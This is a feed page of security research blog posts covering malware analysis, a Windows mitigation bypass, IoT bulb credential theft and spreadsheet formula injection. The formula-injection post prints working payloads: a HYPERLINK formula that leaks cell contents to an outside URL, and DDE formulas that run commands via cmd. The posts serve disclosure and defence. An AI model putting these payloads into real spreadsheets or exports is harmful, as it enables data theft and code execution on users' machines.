Quantcast
Channel: Context Information Security Blog
Viewing all 262 articles
Browse latest View live

Careto Malware Masks Ancient but Deadly Virus DNA

$
0
0

Kaspersky recently discovered a new family of malware, dubbed ‘The Mask’ or ‘Careto’, which it described as one of the "most advanced global cyber-espionage operations to date”[1]. This description is echoed by other anti-virus vendors such as McAfee who call it “highly sophisticated”[2]. This description is due in part to its complexity as well as its suspected attribution to a nation-state. These comments made it an interesting target for analysis with a view to examining the techniques that are used by what is widely considered to be a state-sponsored and sophisticated actor in deploying offensive cyber-weaponry.

We were able to acquire samples and, with a particular interest in the component called 'SGH' which was described by Kaspersky as the most advanced part of The Mask’s toolset, we began to analyse them. SGH is elsewhere described as having 'bootkit' functionality which is particularly intriguing for its potential functionality as well as power over a target system.

A bootkit is generally understood to mean a rootkit-style agent that has ‘infected’ the boot process of a system. To have malicious code running at the very beginning of the loading of an operating system allows the code to take control and subvert the security of the operating system before it has even started; as such it has the potential to be a very potent weapon.

Despite this fact, the bootkit aspect has come under little scrutiny in the analyses by the AV vendors, so it stood out as the most interesting area to focus on in our research.

Upon examination of SGH, it became clear that the ‘bootkit’ label refers to a subroutine which patches the bootmgr executable file that underpins the Windows boot process. Since the release of Vista, modern Windows systems can boot using one of two technologies: the modern Extended Firmware Interface (EFI) and the legacy BIOS-based system that has been present in IBM PC-compatible personal computers since the days of DOS.

In the case of BIOS-based systems, which comprise a significant number of Windows systems today, the chain of execution during the boot process is as follows:

                                                                                 

It might be surprising to note that this early code executed in the MBR, VBR and the beginning of the bootmgr executable is run in 16-bit ‘real’ mode - a legacy mode of the IA32 architecture which PC processors start in. This is true even of modern 64-bit systems that still have a BIOS.

When faced with a binary comprised of 16-bit code and the real mode of IBM-compatible PC architecture, it seems that the question the malware authors posed themselves was “why reinvent the wheel?” - virus writers in the 80s and 90s invented many ingenious 16-bit tricks and techniques. Early in virus evolution, the infection mechanism of file-appending was pioneered, and The Mask demonstrates that this simple technique can still be effective today. Old tricks are sometimes the best it seems, as the method by which SGH achieves its bootkit functionality and infects the bootmgr binary is to employ this ‘old skool’ 16-bit infection strategy straight from the history books.

Although in the specific sample we analysed, the function used to patch the bootmgr is not actually used, it is still present and we can infer how it works by reverse engineering the code. It is apparent upon analysis that the function expects two chunks of data; the first is interpreted as the size of the code to be appended to the bootmgr binary, the second is the data, taken as the raw bytes of code, to be appended to the target.

The function begins by reading the first three bytes of bootmgr. If we disassemble this binary (remembering to choose 16-bit as our architecture) we can see that the very first instruction at the entry point is a jmp instruction which takes three bytes to encode.

                 

The first byte (0xE9) is the byte that defines the instruction as a jmp, the next two bytes are the offset, or the relative distance, to jump to. This distance is taken from the address following the jump, which is three bytes in size. In the above case (with bootmgr taken from Windows 7 x64 SP1) these bytes are 0xD5 and 0x01, which when interpreted as a little-endian value, is 0x1D5, so the resulting target is 0x1D8. Thus, upon execution, the code in bootmgr immediately jumps forward to this address where it continues execution.

                            

This next section of code is the area the SGH bootmgr-infecting function targets for modification or ‘patching’. In order to be able to reliably locate this code across multiple potential versions of the bootmgr binary, perhaps due to different Windows versions, SGH follows this initial jump, and then goes to the target location. Here the first thing it does is to check whether the executable has already been infected. In traditional terminology it checks for an infection marker, which in this case means it checks whether the code here has been patched before:                

If it finds the executable has already been patched, it terminates here as there is no point in repeating this (not to mention the complication of appending its own code later multiple times).

If it finds that the executable has not already been infected, it reads 8 bytes which it stores for later, just like a classic virus would, before overwriting them with an indirect jump to the end of the file. This jump is encoded in 8 bytes, with two push instructions followed by a retf or ‘far return’ which pops the values just pushed to the stack and interprets them as a segmented address which is the memory implementation used in the 16-bit real mode of x86-compatible CPUs.

                 

A segmented address consists of segment and offset, and here the retf takes the two values pushed as code segment and instruction pointer, putting the values into the corresponding registers and thus effectively jumping to that address. The values that SGH places here are calculated using the current location and file size, and so SGH redirects the execution flow to the end of the file, where of course it appends its own code, as well as a copy of the 8 original bytes it overwrote from the initial patch it made.

                    
Old school diagram of old school infection technique.

Because the sample we have seen doesn’t actually use this patching function, we of course haven’t seen what code is intended to be appended to the end of bootmgr, or what purpose it serves. But to have control over the operating system at such an early stage of course imparts great power, so we are very keen to get hold of other samples to see if any of them make use of this feature. In the meantime we are left to wonder whether this resurgence of the 16-bit file-appending infection is due to its simple effectiveness, or whether there is an element of recognition and respect for the original technique and the classic virus writing scene. Perhaps the very same talented virus writers, who back in the 80s and 90s pioneered this and other virus techniques, have now been recruited by the organisation behind The Mask and are working to develop their cyber-weaponry arsenal. In which case the rest of the world beware!


[1]http://www.kaspersky.com/about/news/virus/2014/Kaspersky-Lab-Uncovers-The-Mask-One-of-the-Most-Advanced-Global-Cyber-espionage-Operations-to-Date-Due-to-the-Complexity-of-the-Toolset-Used-by-the-Attackers

[2]http://blogs.mcafee.com/mcafee-labs/careto-unmasked




Bypassing Windows 8.1 Mitigations using Unsafe COM Objects

$
0
0

In October last year I was awarded the first $100,000 bounty for a Mitigation Bypass in Microsoft Windows. My original plan was to not discuss it in any depth until Microsoft had come up with a sufficient changes to reduce the impact of the bypass. However as other researchers have basically come up with variants of the same technique, some of which are publically disclosed with proof-of-concept code it seemed silly to not discuss my winning entry. So what follows is some technical detail about the bypass itself.

I am not usually known for finding memory corruption vulnerabilities, mainly because I don’t go looking for them. Still I know my way around and so I knew the challenges I would face trying to come up with a suitable mitigation bypass entry. I realised that about the only way of having a successful entry would be to take a difficult to exploit memory corruption vulnerability and try and find a way of turning that into reliable code execution.

For that reason I settled on investigating the exploitation of a memory overwrite where the only value you could write was the number 0. Converting a 0 overwrite of this sort, while not impossible to exploit, certainly presents some challenges. I also stated that I could not disclose the existing contents of memory. If you have an information disclosure vulnerability then it is generally game over anyway, so I was confident that would not pass for a winning entry.

ActiveX and COM

The attack vector for the mitigation bypass was safe-scriptable COM objects. As COM is a general technology, not limited to safe-scripted environments such as Internet Explorer, there are many unsafe objects which could be abused if they were allowed to be created. To prevent this, hosts, such as Internet Explorer, use two mechanisms to determine whether an object is safe for being used in the host environment, Category IDs and the IObjectSafety interface. The Category IDs, CATID_SafeForScripting and  CATID_SafeForInitializing can be added to a COM object registration to indicate to a COM host that the object is safe for either scripting or initialisation. These are static indicators, and are not particularly of interest.

Things get more interesting with the IObjectSafety interface which is implemented by the COM object. The host can call the GetInterfaceSafetyOptions method to determine whether a COM object is safe to script or initialise (of course this means that the object must have already been created). The interface also has a secondary purpose; once a host has determined that an object is safe it can call the SetInterfaceSafetyOptions method to tell the object how safe it needs to be.
This method has a particular implication; it allows COM objects to be written in a generic way with potentially dangerous functionality (such as arbitrary script code execution) and then secured at runtime by disabling the unsafe functions. The typical way this is implemented is by setting flags within the object's memory to indicate the security of the object. This is the attack vector chosen. If we have a suitable memory corruption vulnerability it might be possible to change these security flags to convert a secure object back to an insecure one and use that to circumvent in-place mitigations.

A related topic is the setting of an object's site. A Site is normally a reference to the hosting environment for the COM object, such as the OLE container or hosting HTML document. This makes a number of security related functions possible, such as enforcing the same-origin policy for COM objects in a web page (through querying for the IHTMLDocument2 interface and reading the URL property), zone determination or accessing the host security manager. Depending on what we attack we might need to deal with the Site as well.

The important point of all this is by default there are many objects which are unsafe until certain flags are stored within the memory allocated for the object. Therefore the unsafe state of these flags is the value 0, where as the safe state is non-zero. This means that if we have got a 0 overwrite vulnerability we can reset the security flags back to the unsafe state and exploit the unsafe functionality of the COM object.

Attacking MSXML

To demonstrate an attack against scriptable COM objects a suitable object is needed. It must meet some set of criteria to allow us to use the memory corruption vulnerability to bypass mitigations. I determined that the criteria were:

  1. The object must be creatable in common COM hosts without significant security issues such as being blocked by policy or site locking
  2. The object must be available on default Windows installations or be extremely common
  3. The object must do something of benefit to an attacker when insecure, but not expose that functionality when secure (otherwise it would just be a security vulnerability)
  4. It must be relatively trivial to convert from secure to insecure through a minimal number of zero memory overwrites

The COM objects chosen for the demonstration are implemented by the MSXML libraries. Windows 8.1 comes with versions 3 and 6 of the MSXML library installed by default. They are pretty much considered de-facto secure as without them some websites would break; therefore there are no issues with site-locking or blacklisting. They can even be created in the immersive version of IE without issue. They also have some significant functionality when insecure, namely the ability to circumvent same-origin policy and also to execute fully-privileged scripts within the context of XSL transformation.

So MSXML meets the first three criteria, but what about the 4th? Many of the objects that MSXML exposes implement the IObjectSafety interface which is the mechanism through which safety is enabled as shown above. The object also supports the INTERFACE_USES_SECURITY_MANAGER flag which means that the object will utilise the security manager from the hosted site to make some trust decisions. Through reverse engineering the safe objects such as DOMDocument and XMLHTTP, it can be seen that they all contain the COMSafeControlRoot structure, which is used to implement the IObjectSafety and security manager features. In MSXML3 this consists of 6 fields, in the default insecure version these values are all NULL, while in a secure version they contain pointers to site objects and security managers as well as the current security flags set through SetInterfaceSafetyOptions. The rough outline of this structure is shown below:

Through inspection, I found that of the 6 values in memory only two were important when it came to bypassing the security mechanisms. This was a pointer to the host security manager at offset 4 and the security flags at offset 20. Crucially these can be reverted back to NULL without causing any other significant effect on the object’s functionality. This means that a very restricted memory corruption could achieve the desired effect, namely our overwrite with zero.

Finding an Object in Memory

The biggest issue with this technique is that whilst it would be easy enough to modify an object in memory to disable the security without an information disclosure vulnerability, we would not know where it was. If you had an information disclosure vulnerability you probably would not need to use this technique at all.

The bypass must be able to guess the location of a valid object in memory and attack it blind. The design of typical scriptable COM hosts come in handy here to achieve this goal.

  1. They usually allow you to create an arbitrary number of new objects, this allows for the heap to be flooded with object instances
  2. The allocation of COM objects is up to the COM library to implement; therefore it might not be using best practice or it might disable security mitigations
  3. The scripting ability allows for executing specific sequences of operations to improve reliable allocation patterns

In the general case this makes it a lot easier to use a heap flood technique to generate a reliable pattern of objects on the heap and of a large enough size to guess the location of an object. If a regular pattern of objects can be achieved we can use an arbitrary overwrite to modify values in memory through a guessed location and then find the insecure object to execute our code.

There are some issues with the heap improvements in Windows 8. For a start there is a new mitigation called Low Fragmentation Heap Randomisation. The Low Fragmentation Heap (LFH) is a special memory heap used for small allocations to reduce the amount of memory fragmentation that occurs during allocation and freeing of memory. In Windows 8 the order of what blocks is allocated has a random element to it. This makes it more difficult to lay out guessable patterns of allocations.

At least once you start allocating 1000s of objects it is still possible to find some level of reliability for allocations. However MSXML3 provides an ideal case, presumably for legacy reasons when running on a multi-processor system it creates its own heap passing the HEAP_NO_SERIALIZE flag. This means that the LFH is disabled which also disables some of the heap improvements in Windows 8. This makes the heap flooding considerably more reliable.

The targeted COM object in that library is MSXML2.XMLHTTP.3.0. This is because this object has a considerably smaller heap footprint than DOMDocument which would be the more obvious choice. As long as the object is opened you can read the requestXML property (even without sending the request) to get a DOMDocument object. This document inherits the security settings of the parent XMLHTTP object which allows us to modify XMLHTTP and then use that to execute arbitrary script code.

To lay out the heap the provided PoC creates 40,000 instances of XMLHTTP and stores them in an array. Each instance also has the ‘open’ method called on it and a request header set to increase the allocation size for a single object. This results in a repeating 8192 byte pattern of objects being created in memory which looks similar to the following:

The actual code was quite simple:

 

 Once the heap was flooded the next step was to write the 0 values to a guessed address. The address was chosen empirically, and for the proof-of-concept the overwrite was actually performed using a custom control rather than a real memory corruption vulnerability.  By guessing the base address of an object and writing 0s to offsets 4 and 20 we will have disabled the security on one XMLHTTP object, we just need to find which one. For that, the proof-of-concept just enumerated all allocated objects trying each one in turn with a XSL document with an msxsl:script tag containing JScript to start notepad. If the object is still secure then this process will throw an exception, if not we succeeded, notepad has been executed and we can stop looking.

Real World Zero Overwrites

Of course this entire bypass is predicated on finding a vulnerability which allows you to do an arbitrary overwrite with a 0. How likely is that in the real world? Well honestly I can not give any figures but don't forget that 0 is the typical default state for values, so any code which tries to initialize a value under an attackers control will probably set it to zero.

A good example is COM itself. Every COM object must implement the IUnknown interface, the first function QueryInterface is used to convert the object to different interface types. It takes a pointer to the IID and a pointer to a pointer for the returned interface, assuming it supports the required interface. It is recommended that if the object doesn't support the interface it should ensure the outbound pointer is set to NULL before returning.

If you've already guessed the location of a COM object you might only be a V-Table dereference away from your coveted arbitrary zero overwrite.

Conclusions

Obviously this particular example has limitations. It only worked reliably in 32 bit versions of IE as heap flooding is very difficult to do in a reliable way on 64 bit. Of course if you combined this technique with a memory disclosure vulnerability you can achieve code execution without needing to control EIP.

The technique is more general than just COM objects in IE. Any structure in a program which has both safe and unsafe functionality is a suitable target. The PoC was necessary to demonstrate the potential. It is interesting that techniques like this are subject to convergent discovery, I wasn't the only person to stumble upon a similar idea, the only reason it is an issue now is the easy routes of exploitation have been closed.

Hacking into Internet Connected Light Bulbs

$
0
0

The subject of this blog, the LIFX light bulb, bills itself as the light bulb reinvented; a “WiFi enabled multi-color [sic], energy efficient LED light bulb” that can be controlled from a smartphone [1]. We chose to investigate this device due to its use of emerging wireless network protocols, the way it came to market and its appeal to the technophile in all of us. The LIFX project started off on crowd funding website Kickstarter in September 2012 where it proved hugely popular, bringing in over 13 times its original funding target.

LIFX bulbs connect to a WiFi network in order to allow them to be controlled using a smart phone application. In a situation where multiple bulbs are available, only one bulb will connect to the network. This “master” bulb receives commands from the smart phone application, and broadcasts them to all other bulbs over an 802.15.4 6LoWPAN wireless mesh network.


WiFi and 802.15.4 6LoWPAN Mesh Network

In the event of the master bulb being turned off or disconnected from the network, one of the remaining bulbs elects to take its position as the master and connects to the WiFi network ready to relay commands to any further remaining bulbs. This architecture requires only one bulb to be connected to the WiFi at a time, which has numerous benefits including allowing the remaining bulbs to run on low power when not illuminated, extending the useable range of the bulb network to well past that of just the WiFi network and reducing congestion on the WiFi network.

Needless to say, the use of emerging wireless communication protocols, mesh networking and master / slave communication roles interested the hacker in us, so we picked up a few bulbs and set about our research.

The research presented in this blog was performed against version 1.1 of the LIFX firmware. Since reporting the findings to LIFX, version 1.2 has been made available for download.

Analysing the Attack Surface

There are three core communication components in the LIFX bulb network:

1.       Smart phone to bulb communication

2.       Bulb WiFi communication

3.       Bulb mesh network communication

Due to the technical challenges involved, specialist equipment required and general perception that it would be the hardest, we decided to begin our search for vulnerabilities in the intra-bulb 802.15.4 6LoWPAN wireless mesh network. Specifically, we decided to investigate how the bulbs shared the WiFi network credentials between themselves over the 6LoWPAN mesh network.

6LoWPAN is a wireless communication specification built upon IEE802.15.4, the same base standard used by Zigbee, designed to allow IPv6 packets to be forwarded over low power Personal Area Networks (PAN).

In order to monitor and inject 6LoWPAN traffic, we required a peripheral device which uses the 802.15.4 specification. The device chosen for this task was the ATMEL AVR Raven [2] installed with the Contiki 6LoWPAN firmware image [3]. This presents a standard network interface from which we could monitor and inject network traffic into the LIFX mesh network.

Protocol Analysis

With the Contiki installed Raven network interface we were in a position to monitor and inject network traffic into the LIFX mesh network. The protocol observed appeared to be, in the most part, unencrypted. This allowed us to easily dissect the protocol, craft messages to control the light bulbs and replay arbitrary packet payloads.

Monitoring packets captured from the mesh network whilst adding new bulbs, we were able to identify the specific packets in which the WiFi network credentials were shared among the bulbs. The on-boarding process consists of the master bulb broadcasting for new bulbs on the network. A new bulb responds to the master and then requests the WiFi details to be transferred. The master bulb then broadcasts the WiFi details, encrypted, across the mesh network. The new bulb is then added to the list of available bulbs in the LIFX smart phone application.


Wireshark 6LoWPAN packet capture

As can be observed in the packet capture above, the WiFi details, including credentials, were transferred as an encrypted binary blob.

Further analysis of the on-boarding process identified that we could inject packets into the mesh network to request the WiFi details without the master bulb first beaconing for new bulbs. Further to this, requesting just the WiFi details did not add any new devices or raise any alerts within the LIFX smart phone application.

At this point we could arbitrarily request the WiFi credentials from the mesh network, but did not have the necessary information to decrypt them. In order to take this attack any further we would need to identify and understand the encryption mechanism in use.

Obtaining the Firmware

In the normal course of gaining an understanding of encryption implementations on new devices, we first start with analysing the firmware. In an ideal world, this is simply a case of downloading the firmware from the vendor website, unpacking, decrypting or otherwise mangling it into a format we can use and we are ready to get started. However, at the time of the research the LIFX device was relatively new to market, therefore the vendor had not released a firmware download to the public that we could analyse. In this case, we have to fall back to Plan B and go and obtain the firmware for ourselves.

In order to extract the firmware from the device, we first need to gain physical access to the microcontrollers embedded within; an extremely technical process, which to the layman may appear to be no more than hitting it with a hammer until it spills its insides. Once removed from the casing, the Printed Circuit Board (PCB) is accessible providing us with the access we require.


Extracted LIFX PCB

It should be noted that public sources can be consulted if only visual access to the PCB is needed. The American Federal Communications Commission (FCC) often release detailed tear downs of communications equipment which can be a great place to start if the hammer technique is considered slightly over the top [4].

Analysing the PCB we were able to determine that the device is made up primarily of two System-on-Chip (SoC) Integrated Circuits (ICs): a Texas Instruments CC2538 that is responsible for the 6LoWPAN mesh network side of the device communication; and a STMicroelectronics STM32F205ZG (marked LIFX LWM-01-A), which is responsible for the WiFi side of the communication. Both of these chips are based on the ARM Cortex-M3 processor. Further analysis identified that JTAG pins for each of the chips were functional, with headers presented on the PCB.

JTAG, which stands for Joint Test Action Group, is the commonly used name for the IEEE 1149.1 standard which describes a protocol for testing microcontrollers for defects, and debugging hardware through a Test Action Port interface.

Once the correct JTAG pins for each of the chips were identified, a process which required manual pin tracing, specification analysis and automated probing, we were ready to connect to the JTAG interfaces of the chips. In order to control the JTAG commands sent to the chips, a combination of hardware and software is required. The hardware used in this case was the open hardware BusBlaster JTAG debugger [5], which was paired with the open source Open On-Chip Debugger (OpenOCD) [6]. After configuring the hardware and software pair, we were in a position where we could issue JTAG commands to the chips.


BusBlaster JTAG debugger [5]

At this point we can merrily dump the flash memory from each of the chips and start the firmware reverse engineering process.

Reversing the Firmware

Now we are in possession of two binary blob firmware images we needed to identify which image is responsible for storing and encrypting the WiFi credentials. A quick “strings” on the images identified that the credentials were stored in the firmware image from the LIFX LWM-01-A chip.

Loading the firmware image into IDA Pro, we could then identify the encryption code by looking for common cryptographic constants: S-Boxes, Forward and Reverse Tables and Initialization Constants. This analysis identified that an AES implementation was being used.

AES, being a symmetric encryption cipher, requires both the encrypting party and the decrypting party to have access to the same pre-shared key. In a design such as the one employed by LIFX, this immediately raises alarm bells, implying that each device is issued with a constant global key. If the pre-shared key can be obtained from one device, it can be used to decrypt messages sent from all other devices using the same key. In this case, the key could be used to decrypt encrypted messages sent from any LIFX bulb.

References to the cryptographic constants can also be used to identify the assembly code responsible for implementing the encryption and decryption routines. With the assistance of a free software AES implementation [7], reversing the identified encryption functions to extract the encryption key, initialization vector and block mode was relatively simple.


IDA Pro disassembly of firmware encryption code

The final step was to prove the accuracy of the extracted encryption variables by using them to decrypt WiFi credentials sniffed off the mesh network.

Putting it All Together

Armed with knowledge of the encryption algorithm, key, initialization vector and an understanding of the mesh network protocol we could then inject packets into the mesh network, capture the WiFi details and decrypt the credentials, all without any prior authentication or alerting of our presence. Success!

It should be noted, since this attack works on the 802.15.4 6LoWPAN wireless mesh network, an attacker would need to be within wireless range, ~30 meters, of a vulnerable LIFX bulb to perform this attack, severely limiting the practicality for exploitation on a large scale.

Vendor Fix
Context informed LIFX of our research findings, who were proactive in their response. Context have since worked with LIFX to help them provide a fix this specific issue, along with other further security improvements. The fix, which is included in the new firmware available at http://updates.lifx.co/, now encrypts all 6LoWPAN traffic, using an encryption key derived from the WiFi credentials, and includes functionality for secure on-boarding of new bulbs on to the network.

Of course, as with any internet connecting device, whether phone, laptop, light bulb or rabbit, there is always a chance of someone being able to hack it. Look forward to our upcoming blogs for more details.

References

[1] http://lifx.co

[2] http://www.atmel.com/tools/avrraven.aspx

[3] http://www.contiki-os.org/

[4] https://apps.fcc.gov/oetcf/eas/reports/ViewExhibitReport.cfm?mode=Exhibits&RequestTimeout=500&calledFromFrame=N&application_id=216608&fcc_id=2AA53-LIFX01

[5] http://dangerousprototypes.com/docs/Bus_Blaster

[6] http://openocd.sourceforge.net/

[7] http://svn.ghostscript.com/ghostscript/tags/ghostscript-9.01/base/aes.c




A Cruel Interest: Attacker motivations for targeting the financial services sector

$
0
0

A question we often get asked is “why would APTs target my organisation, what could a state sponsored attacker possibly want with us?” While the core areas of government and the defence establishment seem like obvious targets, and to most people there is an intuitive understanding of the motivations behind those attacks, you don’t have to wander far from these sectors for the understanding to become a bit more clouded.

One of the more interesting sectors in regard to this, and an area where we find this type of question arises a lot, is the financial services sector. Generally, organisations in the finance sector are above the median in terms of their overall security posture and understand their traditional threats very well. The motivations of their traditional foes, in the form of criminal actors, are comfortingly straightforward and indeed haven’t changed that much from the days of Tommy-gun-wielding public enemies making off on the running boards of vintage Chevys.

Beyond the bank robber motivations what else is likely to drive attacks against this sector?

Aside from the motivation provided by immediate financial benefit, attackers will also take the longer view and go after finance sector companies due to their involvement in sensitive commercial projects. For example where they might provide funding for development, new ventures or exploration, or where they may be involved in merger and acquisition activity. Fairly closely related to this is the likelihood that many finance companies, whether they realise it or not, aggregate information from a wide range of third-party organisations that are valuable targets themselves.

Regardless of specific tasking or immediate prospect of monetisation, this aggregated information is likely to be of great interest to both cyber criminals and more targeted groups alike. This type of information could be capitalised upon by criminal actors for financial benefit through more in-direct means, such as piggy-backing on associated stock movements; and on the targeted side this information is invaluable intelligence for state-owned enterprises on the one-hand, as well as more traditional industrial/commercial espionage on the other. The insight provided by access to this information could be leveraged to provide a competitive edge in commercial negotiations or bidding processes, or through revealing competitor business plans more generally.

Another angle is hinted at by the Gauss infections originally publicised by Kaspersky in 2012[1]. While it is difficult to define the exact intent of the people behind Gauss, the inclusion of capability to target several financial institutions raises interesting questions around targeting by state-sponsored actors.  In-keeping with Kaspersky’s proposed attribution of Gauss and its purported siblings (Stuxnet, Duqu and Flame) to an Israeli state entity, one could postulate that such a program would serve to provide valuable FININT[2] to a state intelligence mission, perhaps highlighting the movement of funds which eventually end up fuelling the work of groups of interest such as Hezbollah. 

Regardless of whether or not this particular theory is correct, as a general rule a subset of state-sponsored targeted attack groups will have an interest in financial institutions in order to track the finances and financing of groups of interest. While there are often legal frameworks allowing this access and analysis, in situations where this may not be possible through the usual law enforcement means the arts of cyber espionage may be leveraged. In essence this highlights how traditional intelligence gathering for national security related purposes is a likely motivation for state-sponsored groups, alongside the IP theft/economic advantage motivations that have dominated many of the campaigns brought to light in recent times.

Beyond this there is also the as yet hypothetical case of attackers penetrating financial institutions in order to stage tools to facilitate disruption of financial markets, payment systems and global money flow as an offensive capability (getting into that much hackneyed area of Cyber Warfare). Although this has yet to be seen, we have seen some pointers to this previously, in the form of the 2007 Estonian internet attacks[3] and the attacks against Georgian websites during the 2008 Russian-Georgia conflict[4]. While entirely hypothetical at this stage it would seem to be a safe bet that many states would at least consider developing this capability - not to mention the aspirations of hacktivist groups or nationalistically motivated "cyber-militias".


[1]http://www.kaspersky.com/about/news/virus/2012/Kaspersky_Lab_and_ITU_Discover_Gauss_A_New_Complex_Cyber_Threat_Designed_to_Monitor_Online_Banking_Accounts

[2]http://en.wikipedia.org/wiki/Financial_intelligence

[3]www.symantec.com/connect/blogs/politics-wire

[4]www.economist.com/node/12673385

Comma Separated Vulnerabilities

$
0
0

This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.


Formula Injection

Many modern web applications and frameworks offer spreadsheet export functionality, allowing users to download data in a .csv or .xls file suitable for handling in spreadsheet applications like Microsoft Excel and OpenOffice Calc.  The resulting spreadsheet’s cells often contain input from untrusted sources such as survey responses, transaction details, and user-supplied addresses.

This is inherently risky, because any cells starting with the ‘=’ character will be interpreted by the spreadsheet software as formulae. For example, picture an online store that allows administrators to export the details of all recent purchases. If a malicious customer buys a product and sets their delivery address to the following:

        =HYPERLINK("http://contextis.co.uk?leak="&A1&A2, "Error: please click for further information")

The administrator’s ‘recent purchases’ spreadsheet will contain the following cell:


If the administrator clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to http://contextis.co.uk, which may include other users’ payment details.


Delivering exploits

Malicious formulae pose a risk even when the embedding spreadsheet doesn’t contain any sensitive information, as they can be used to compromise the viewer’s computer.

Dynamic Data Exchange (DDE) is a protocol for interprocess communication under Windows supported by Microsoft Excel, LibreOffice and Apache OpenOffice. In the latter two, it can be invoked using the following formula:

        =DDE(server; file; item; mode)

Context found that by specifying some creative arguments and a magic number, it’s possible to craft a ‘link’ that hijacks the computer of whoever opens the document. The following formula simply launches calc.exe but it could easily conscript the computer into a botnet or just about anything else.

        =DDE("cmd";"/C calc";"__DdeLink_60_870516294")

When this formula is viewed in a typical spreadsheet, the user is shown an innocuous warning first:





However, when the payload is inside a CSV, the command is executed before the warning is displayed.

This vulnerability was privately disclosed to the affected vendors on the 9th July 2014. OpenOffice and LibreOffice patched it on 21st August and the 10th July respectively. OpenOffice classified it as CVE-2014-3524 and LibreOffice failed to acknowledge it.

This is unlikely to be the last formula based vulnerability, and formula injection provides an excellent delivery mechanism for such exploits. A given computer’s susceptibility to attack can be assessed using the INFO formula, which helpfully returns the spreadsheet software‘s name, operating system and version number. Conditional IF… ELSE statements can then be used to deliver the appropriate payload.


Exploiting trust relationships

A second, more subtle technique can be used to hijack users’ computers without relying on an unpatched vulnerability in client software.

We will once again use our good friend DDE, but this time target Microsoft Excel. In Excel, the syntax to execute arbitrary commands is simply:

        =cmd|' /C calc'!A0

Microsoft is clearly aware that DDE can be used maliciously; opening a document containing DDE triggers two fearsome security warnings:



However, there is a serious issue with these warning messages. They both recommend that the user should click no if they do not trust the source of the file. If you had personally generated a spreadsheet from a website you trust, would you trust it? You might if you had skipped the section on formula injection. This is not a vulnerability in Excel, but in every website that places active content from untrusted sources into spreadsheets.


Remediation

Spreadsheet software could take steps to mitigate some of these attacks, but preventing formula injection is ultimately the responsibility of every application that generates spreadsheets containing user-supplied content. At present, the best defence strategy we are aware of is prefixing cells that start with ‘=’ with an apostrophe. This will ensure that the cell isn’t interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed.

Another lesson from this is that .csv and .tsv files should not be viewed as equivalent to .txt files in terms of safety, as it’s simple to embed active content into them.

Finally, ensure you’re running Apache OpenOffice version 4.1.1 or later, and LibreOffice version 4.2.5 or later.


Further research

This issue isn’t specific to web applications or any particular file format – any situation where untrusted content ends up in a spreadsheet could be exploited. Aside from identifying the numerous vulnerable applications, there is plenty of scope for further research on this attack technique itself. A key improvement would be finding a way to extract content from documents without relying on any user interaction. Finally, spreadsheet software presents a soft attack surface relative to web browsers, so it is likely that further investigation may reveal additional formula-based code execution vulnerabilities.

Thanks to Rohan Durve for help crafting the DDE payloads, and the OpenOffice security team for gracefully handling them.

Upcoming service announcement: IRIS, a new aperture on Incident Response

$
0
0

Rapid incident response is a core function of Context's Response division and we pride ourselves on the close relationships and integration we build with our clients. However, we have found an increasing need amongst our clients for access to our Response services in a more formalised manner, allowing them to be included as a specific and integrated part of the incident response planning process. Fundamentally this means we can provide these services in such a way that clients can call upon them during the high pressure of live incident response with the assurance that the resource and support will be available when they need it.

Context has developed the Incident Response Investigation Support Service (a.k.a. IRIS) to provide access to Context Incident Response consultants, expertise and capability within timeframes defined by a Service Level Agreement. This service is being offered on a subscription or retainer basis, providing a cost effective way of gaining reliable access to capability that is a foundational requirement for effective incident response.

Aside from fulfilling this specific requirement, Context believes that IRIS will also provide significant additional benefits to subscribed clients. Key among these will be the potential for reductions in overheads and costs associated with incident response due to the reduced requirement to maintain the necessary capability internally. The maintenance of analytic software suites and supporting hardware alone are a significant ongoing cost for many organisations, not to mention the teams and skill requirements to use them.

Context recognises that there is difficulty in acquiring, recruiting and maintaining the specialist information security professionals, skillsets and tools within the average organisation on a cost effective basis. Even many larger organisations that employ information security teams including individuals with incident response skillsets find it difficult to recruit them in the first instance due to an information security skills shortage across the industry. Additionally, core cyber security skillsets can have a very short "half-life" and constant use is required to maintain them at an effective level. This constant exposure is difficult to provide within very many internal information security teams.

The range of skills required to provide a well-rounded incident response team may necessitate a team size significantly larger than would otherwise be required for core network administration function, which in combination with increasing premium that information security skills are commanding in the marketplace, can stretch budgets to an unacceptable degree. Add to this the associated costs around software licensing, hardware and ongoing training necessary to do the job and the cost of providing adequate incident response capability, can become prohibitive for many organisations.

IRIS seeks to address these challenges by providing an alternative to standing up and maintaining these capabilities internally, and while the commercial aspects are still in the process of being finalised, we are confident that it will be a very cost effective solution that will provide this capability at a fraction of the overhead.

This new service is on track to take its first subscribers in October and will initially be available within the UK, although coverage is likely to expand to other areas in due course. If your organisation has specific requirements along these lines we welcome enquiries and will work with you to scope IRIS coverage.  The service will be offered at a number of levels as defined by the SLAs provided - with coverage and response times ranging from 24/7, 365 days a year, with 24 hour "boots on ground" response, through to business hours coverage and response within 3 business days. Given this flexibility we believe that the service will be a viable and valuable option for organisations of any size, from small start-ups through to our larger multinational clients.

Should you wish to register interest in this service or would like further information, then please get in touch with your account manager, or contact us at info@contextis.co.uk.

Hacking Canon Pixma Printers - Doomed Encryption

$
0
0

This blog post is another in the series demonstrating current insecurities in devices categorised as the ‘Internet of Things’.  This instalment will reveal how the firmware on Canon Pixma printers (used in the home and by SMEs) can be modified from the Internet to run custom code.  Canon Pixma wireless printers have a web interface that shows information about the printer, for example the ink levels, which allows for test pages to be printed and for the firmware to be checked for updates. 


Figure 1 - Web Interface Pixma MG6450

